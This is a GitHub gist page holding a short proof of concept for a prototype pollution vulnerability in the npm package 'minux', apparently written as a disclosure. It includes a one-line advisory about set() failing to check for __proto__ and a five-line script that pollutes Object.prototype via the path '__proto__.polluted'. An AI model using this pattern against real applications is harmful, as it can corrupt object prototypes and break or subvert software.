miguelafmonteiro/minux_poc.js

Created July 18, 2023 09:30

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/miguelafmonteiro/bba30296d35d4d40faec5de6c3aee28f.js"></script>
Save miguelafmonteiro/bba30296d35d4d40faec5de6c3aee28f to your computer and use it in GitHub Desktop.

Download ZIP

Affected versions of this package are vulnerable to Prototype Pollution. The function set() (index.js#92) adds in the target object a nested property specified in the path without checking the provided keys for sensitive properties like __proto__.

Raw

minux_poc.js

	const minux = require('minux');

	console.log({}.__proto__)
	minux("__proto__.polluted")
	console.log({}.__proto__)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment